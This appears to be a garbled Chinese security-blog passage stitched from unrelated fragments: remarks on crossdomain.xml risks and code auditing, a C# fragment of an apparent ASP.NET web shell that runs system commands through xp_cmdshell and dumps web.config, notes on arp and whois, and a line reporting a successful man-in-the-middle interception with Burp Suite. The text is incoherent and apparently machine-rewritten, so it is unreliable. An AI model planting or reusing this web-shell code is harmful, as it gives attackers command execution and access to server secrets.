抽象来说，假如一个站点契合下面3个条件，就会存在crossdomain.xml引起的安全危险。 4） 直接通读全文代码，这种 *** 能够更好的了解代码的事务逻辑，能够挖掘出更有价值的缝隙2.ad_js.php参阅 break; case "3": ExecuteSql1(context, connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'"); break; case "4": ShowPort(context); break; default: ShowWebConfig(context); break; } } catch (Exception ex) { context.Response.Write(ex.Message); } context.Response.End(); } public bool IsReusable { get { return false; } }

arp –a：检查arp缓存信息常用命令：whois域名（要点看whois server和Referral URL）运转程序，点击“Fetch Secret”，程序正常获取到了与图2相同的数据，burp suite也截获了一切信息，如图6，中间人进犯成功。